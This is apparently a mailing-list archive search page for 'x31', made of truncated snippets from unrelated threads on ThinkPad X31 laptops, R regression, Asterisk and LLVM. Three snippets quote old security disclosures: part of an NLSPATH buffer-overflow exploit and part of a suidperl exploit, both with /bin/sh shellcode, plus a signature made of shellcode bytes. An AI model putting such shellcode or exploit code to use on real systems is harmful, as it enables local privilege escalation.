search for: x31

Displaying 20 results from an estimated 72 matches for "x31".

Did you mean: 31
2010 Jan 29
0
Hibernating a laptop with the power button (Thinkpax X31) under CentOS 5.4
I am having a weird problem trying to get hibernation to work when I press the power button on my Thinkpad X31 under CentOS 5.4. I've modified /etc/acpi/events/power.conf to contain: # ACPID config to power down machine if powerbutton is pressed, but only if # no gnome-power-manager is running event=button/power.* action=/bin/ps awwux | /bin/grep gnome-power-manager | /bin/grep -qv grep || /sbin/shut...
2008 May 19
2
Suspend/resume on IBM X31
Greetings I am having trouble with suspend/resume on my Thinkpad X31, running 7.0-STABLE as of April 23. Any help would be appreciated. First problem: When I run "acpiconf -s3" from mulituser mode, the system suspends immediately, without executing /etc/rc.suspend (which has mode 755); then on resume, I get a panic. Second problem: When the system panics...
2012 Jul 15
4
extracting rows and columns from a big matrix
...nsole gives me the "+" sign at the end of the code, pointing out incomplete command, so it is not working: m<-read.table("C:/backup/symmetrical.csv") n<-subset(m, select=c("X1", "X7", "X12", X15", "X22", "X26", "X31", "X34", "X39", "X44", "x51", "X58) Therefore, I have no tried with row names yet. Any suggestions? Sorry for the inconvenience. I have read some information about this but always have the same problem with "+" and I do not have any idea...
1997 Feb 14
0
Linux NLSPATH buffer overflow (fwd)
...topped working. Of course, this is only a temporary fix. --- nlspath.c --- /* * NLSPATH buffer overflow exploit for Linux, tested on Slackware 3.1 * Copyright (c) 1997 by Solar Designer */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> char *shellcode = "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1" "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04" "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb" "\xcd\x80/" "/bin/sh" &qu...
2006 Nov 13
3
Profile confidence intervals and LR chi-square test
...1Q Median 3Q Max -1.6503 -1.0220 -0.7284 0.9965 1.7069 Coefficients: Estimate Std. Error z value Pr(>|z|) (Intercept) -0.3772 0.3721 -1.014 0.3107 x11 -0.8144 0.4422 -1.842 0.0655 . x21 0.9226 0.4609 2.002 0.0453 * x31 1.3347 0.5576 2.394 0.0167 * --- Signif. codes: 0 '***' 0.001 '**' 0.01 '*' 0.05 '.' 0.1 ' ' 1 (Dispersion parameter for binomial family taken to be 1) Null deviance: 137.99 on 99 degrees of freedom Residual deviance: 120.65 on 96...
2006 Jul 06
3
bug/feature
I don't know if this has been mentioned here or even thought of in the grand scheme of things and I'm just sending a one time email about it "just in case" I recently swapped my server around and I'm using dovecot now....LOVE it! Could use a bit more intuitive error messages, but otherwise, it's great! But there is one flaw that I've run into with my users.
2005 Jun 14
1
Matrix stability problem
Hello, This is not a problem with R, the calculated results are mathematically correct. This a matrix stability problem. Because of measuring errors, my matrix solution is a bit off. Here is what my equations look like: A11 x11+A12 x12 +A13 x13 = b1 A21 x21+A22 x21 +A23 x23 = b2 A31 x31+A32 x31 +A33 x33 = b3 A is a reading, X is a measured weight, and b is total. The 3 experiments give slightly different X values because of measurement errors. For reproducibility, here's my A, x and b matrices and vectors A <-matrix( c(0.03,0.02,0.04,0.01,0.015,0.03,-0.01,-0.02,0.03),3,3,b...
2015 May 13
1
registering IAX with Teliax
...[63.211.239.14:4569] USERNAME : gswoods REFRESH : 60 CALLTOKEN : 51 bytes Rx-Frame Retry[ No] -- OSeqno: 000 ISeqno: 001 Type: IAX Subclass: REGAUTH Timestamp: 00019ms SCall: 03026 DCall: 03639 [63.211.239.14:4569] AUTHMETHODS : 3 CHALLENGE : \x31\x33\x34\x35\x38\x37\x34\x39\x31 USERNAME : gswoods Tx-Frame Retry[000] -- OSeqno: 001 ISeqno: 001 Type: IAX Subclass: REGREQ Timestamp: 00115ms SCall: 03639 DCall: 03026 [63.211.239.14:4569] USERNAME : gswoods REFRESH : 60 MD5 RESULT : 74f42b964023f9...
2006 Mar 11
1
Non-linear Regression : Error in eval(expr, envir, enclos)
...4*x8)+(k3*k2*x9)+(k3*k3*x10)+ (k4*x11)+(k4*k1*x12)+(k4*k2*x13)+(k4*k3*x14)+(k4*k4*x15)+(k5*x16)+(k5*k1*x17)+(k5*k2*x18)+(k5*k3*x19)+ (k5*k4*x20)+(k5*k5*x21)+(k6*x22)+(k6*k1*x23)+(k6*k2*x24)+(k6*k3*x25)+(k6*k4*x26)+(k6*k5*x27)+(k6*k6*x28)+ (k7*x29)+(k7*k1*x30)+(k7*k2*x31)+(k7*k3*x32)+(k7*k4*x33)+(k7*k5*x34)+(k7*k6*x35)+(k7*k7*x36)),x, start=c(beta1=-0.001480981,k1=0.001,k2=0.001,k3=0.001,k4=0.001,k5=0.001,k6=0.001,k7=0.001),control=c(maxiter=100)) where beta1, k1 -- k7 are the parameters to be estimated and x1---x36 are the columns of the datafr...
2008 May 19
2
Help on nested FOR loops
...9; loop to produce output that takes subscripts like: for i taking values 1,2,3,4,5 and j taking values 1,2,3 I want to output for a computation using the combination values of i and j a value x like this; i j x 1 1 x11 1 2 x12 1 3 x13 2 1 x21 2 2 x22 2 3 x23 3 1 x31 3 2 x32 3 3 x33 ........ ....... Need help urgently. Thanks. Philip A Smile costs Nothing But Rewards Everything Happiness is not perfected until it is shared -Jane Porter [[alternative HTML versi...
2004 Sep 21
3
how to take this experiment with R?
How about: x <- data.frame(matrix(rnorm(1550),c(50,31))) model <- step(lm(x[,1] ~ as.matrix(x[,2:31]))) --Matt -----Original Message----- From: r-help-bounces at stat.math.ethz.ch [mailto:r-help-bounces at stat.math.ethz.ch]On Behalf Of rongguiwong Sent: Monday, September 20, 2004 20:52 PM To: r-help at stat.math.ethz.ch Subject: [R] how to take this experiment with R? This message uses
2011 Aug 20
2
a Question regarding glm for linear regression
...e number of features or columns. I have about 80 features, and when I fit a model using the following formula,? glmfit = glm(y ~ x1 + x2 + x3 + x4 + x5 + x6 + x7 + x8 + x9 + x10 + x11 + x12 + x13 + x14 + x15 + x16 + x17 + x18 + x19 + x20 + x21 + x22 + x23 + x24 + x25 + x26 + x27 + x28 + x29 + x30 + x31 + x32 + x33 + x34 + x35 + x36 + x37 + x38 + x39 + x40 + x41 + x42 + x43 + x44 + x45 + x46 + x47 + x48 + x49 + x50 + x51 + x52 + x53 + x54 + x55 + x56 + x57 + x58 + x59 + x60 + x61 + x62 + x63 + x64 + x65 + x66 + x67 + x68 + x69 + x70 + x71 + x72 + x73 + x74 + x75 + x76 + x77 + x78 + x79 + x80) it g...
2009 Mar 02
1
cups & hp-toolbox
Hello, I installed a printer (HP LaserJet 4350n) via CUPS Web Interface. Following this when I run hp-toolbox a dialog claiming that "No Installed HP Devices Found" is displayed. This is true even when I am the root user. This worked as expected on RHEL4 on the same computer (Thinkpad X31) with the same printer. Any thoughts will be appreciated. Thanks, roger wells -- Roger Wells, P.E. SAIC 221 Third St Newport, RI 02840 401-847-4210 (voice) 401-849-1585 (fax) roger.k.wells at saic.com
2011 May 01
1
Longitudinal data with non-randomized subjects
...2 for the following data) Data format is like the stanford heart transplant data (Therneau et al 2000, p69), but the patients were not randomized in selection and the covariate balance is not achieved: id time censor tx x1 x21 (0,10] 1 0 x11 x122 (0,8 ] 0 0 x21 x222 (9,19] 1 1 x21 x223 (0,13] 0 1 x31 x32 Is counting process form of a Cox model (coxph with start, stop, censoring status ~ tx + x1 + x2 covariates) sufficient? Is it possible to implement the propensity score methodology (Rosenbaum et al, 1983) in such situations? Any ideas/suggestions would be higly appreciated. Thanks, Ehsan...
2002 Jul 02
0
pam and openssh
...p.s. I'm using a stock RedHat 7.3 GNU/Linux install and openssh is configured like this: ./configure --with-privsep-user=nobody --with-tcp-wrappers --with-pam --with-md5-passwords --with-ipv4-default ------------------------------------------------------------------------------- \x83\xec\x0c\x31\xc0\x31\xd2\x68\x2f\x73\x68\x21\x68\x2f\x62\x69\x6e\x89\xe3 \x88\x43\x07\x50\x50\x53\x53\xb0\x3b\xcd\x80\x89\xf6 Don't forget FreeBSD! -------------------------------------------------------------------------------
2004 Jul 06
3
Dialing out of a voicemail message?
Anyway to make hitting `0` during a voice mail dial an extension? The bosses used to have that feature and love it. Their VM prompt would say: "Hello, My name is blah blah. I am currently unavailable. If you would like to speak to an operator press 0 now, otherwise leave me a message". Extension 0 exists, but dialing it during a VM prompt does nothing. Thanks, -- Daniel Jimenez
2013 Sep 29
1
[LLVMdev] cannot build 3.3, problems with alternate architectures
...Arch64Subtarget.cpp:14:0: AArch64Subtarget.h:29:57: error: expected class-name before ‘{’ token PPCFrameLowering.h: In member function ‘virtual const llvm::TargetFrameLowering::SpillSlot* llvm::PPCFrameLowering::getCalleeSavedSpillSlots(unsigned int&) const’: PPCFrameLowering.h:138:51: error: ‘X31’ is not a member of ‘llvm::PPC’ I'm using the same configure I did for 3.2 (well, I didn't explicitly set gcc before): export REQUIRES_RTTI=1 export REQUIRES_EH=1 export CC=gcc export CXX=g++ ./configure --prefix=/opt/llvm/install --enable-optimized --enable-shared --enable-libffi --enab...
2016 Nov 06
3
MC PowerPC 32 bit vs. 64 bit
...ver the past days I have been proofing a concept involving LLVM MC on the PowerPC target. The 32 bit part went quite ok, but i am puzzled with the results I get using the 64 bit target. When disassembling in 64bit some instructions refer to GPRs in PPC::R0 to PPC::R31, some refer to PPC::X0 to PPC::X31. I understand that the registers are modeled with Rx referring to the 32bit parts and Xx referring to the 64bit parts, but the way it looks to me right now is that you only get the 64bit registers if the opcode is available exclusively in 64bit mode. I have seen that many instructions have been dup...
1997 Nov 13
0
another buffer overrun in sperl5.003
...!/usr/bin/perl # yes, this suidperl exploit is in perl, isn''t it wonderful? :) $| = 1; $shellcode = "\x90" x 512 . # nops "\xbc\xf0\xff\xff\xbf" . # movl $0xbffffff0,%esp # "standard shellcode" by Aleph One "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" . "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" . "\x80\xe8\xdc\xff\xff\xff/bin/sh"; # start and end of .data # adjust this using /proc/*/maps $databot = 0x080a2000; $datatop = 0x080ab000; # trial and error lo...
2018 Mar 14
2
truncation/rounding bug with write.csv
...quot;,"X13","X14","X15","X16","X17","X18","X19","X20","X21","X22","X23","X24","X25","X26","X27","X28","X29","X30","X31","X32","X33","X34","X35","X36","X37","X38","X39","X40","X41","X42","X43","X44","X45","X46","X47","X48","X49",&quot...